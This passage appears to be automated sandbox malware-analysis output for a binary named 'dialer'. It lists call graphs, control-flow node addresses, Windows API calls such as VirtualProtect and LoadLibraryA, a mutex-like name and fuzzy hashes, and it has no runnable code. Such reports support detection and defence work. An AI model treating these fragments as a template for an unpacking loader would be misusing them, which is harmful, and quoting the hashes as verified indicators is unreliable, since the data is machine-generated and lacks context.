calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2366 2920 140001394 2 API calls 2919->2920 2921 140001440 
2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 
2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2366

Callgraph


Control-flow Graph

APIs
• NtAlpcOpenSenderProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
Memory Dump Source
• Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
Similarity
• API ID: AlpcOpenProcessSender
• String ID:
• API String ID: 3910219020-0
• Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
• Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
• Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
• Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 396 140002a43-140002a6b call 1400014c7 389->396 397 140002954-140002963 389->397 391->389 393 140002870-140002877 391->393 394 140002879-140002882 393->394 395 140002840-140002842 393->395 398 140002884-14000289b 394->398 399 1400028e8-1400028eb 394->399 403 14000284a-14000285e 395->403 412 140002a76-140002ab8 call 140001503 call 140006620 memset 396->412 413 140002a6d 396->413 401 140002fa7-140002fe4 call 140001370 397->401 402 140002969-140002978 397->402 405 1400028e5 398->405 406 14000289d-1400028b2 398->406 399->403 408 1400029d4-140002a3e wcsncmp call 1400014e5 402->408 409 14000297a-1400029cd 402->409 403->389 403->391 405->399 411 1400028c0-1400028c7 406->411 408->396 409->408 415 1400028c9-1400028e3 411->415 416 1400028f0-1400028f9 411->416 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415->405 415->411 416->403 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 433 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->433 434 140002bca-140002bde 431->434 432->401 453 140002eed-140002f0b call 140001512 433->453 454 140002f10-140002f38 call 14000145e 433->454 434->433 453->454
APIs
Strings
Memory Dump Source
• Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
Similarity
• API ID: wcslen$memset$wcscatwcscpywcsncmp
• String ID: 0$X$\BaseNamedObjects\llfrvfnuexbwtixr$`
• API String ID: 780471329-2690498009
• Opcode ID: 344dc0d2555831cfefea67499faefd1bc7ea92048f0324c41f2eb0cd16c79055
• Instruction ID: 7be09ba941ed68ffb1b3850f8175c83daa3bfaa79e8fc9c002dedc83ab5f35de
• Opcode Fuzzy Hash: 344dc0d2555831cfefea67499faefd1bc7ea92048f0324c41f2eb0cd16c79055
• Instruction Fuzzy Hash: 90125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
Similarity
• API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
• String ID:
• API String ID: 2643109117-0
• Opcode ID: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
• Instruction ID: 145ef27ce15272fb8ed355f5aa63f0c9a1f5ede9e4593ea7d6eb0f0a7906d2e7
• Opcode Fuzzy Hash: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
• Instruction Fuzzy Hash: F55111F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
APIs
• VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
• VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
• memcpy.MSVCRT ref: 0000000140001CE0
• GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
Strings
Memory Dump Source
• Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
Similarity
• API ID: Virtual$ErrorLastProtectQuerymemcpy
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 2595394609-2123141913
• Opcode ID: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
• Instruction ID: 2ed46510ed1d0a58bb00a12b4a38f7601a8ffa55d26e4d8577210080af0f0105
• Opcode Fuzzy Hash: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
• Instruction Fuzzy Hash: 064132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
APIs
Memory Dump Source
• Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
• String ID:
• API String ID: 3326252324-0
• Opcode ID: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
• Instruction ID: 9494385bac82c96470a5ad2ca80031d016a952209e6f2660f35a807c86e33b41
• Opcode Fuzzy Hash: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
• Instruction Fuzzy Hash: 9121F5B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006be0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: CCG
                                                                                                                                                                                                      • API String ID: 0-1584390748
                                                                                                                                                                                                      • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                                                                                                                                                      • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 595 140001a7d-140001a97 591->595 596 1400019e9-140001a0d VirtualProtect 594->596 597 1400019d0-1400019dd 594->597 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 596->597 597->572 597->594 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->595 613->609 614->600
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                                                                                      • API String ID: 544645111-395989641
                                                                                                                                                                                                      • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                                                                                                                      • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-3474627141
                                                                                                                                                                                                      • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                                                                                                                                                      • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 682475483-0
                                                                                                                                                                                                      • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                                                                                                                      • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:56.2%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:87.5%
                                                                                                                                                                                                      Total number of Nodes:8
                                                                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000051.00000002.2453295770.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000051.00000002.2452848971.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.0000000140500000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.0000000140503000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.000000014078B000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2453295770.000000014080D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000051.00000002.2723965111.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_81_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1941872368-0
                                                                                                                                                                                                      • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                                                                                                                                      • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:2.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                                                      Total number of Nodes:1796
                                                                                                                                                                                                      Total number of Limit Nodes:12
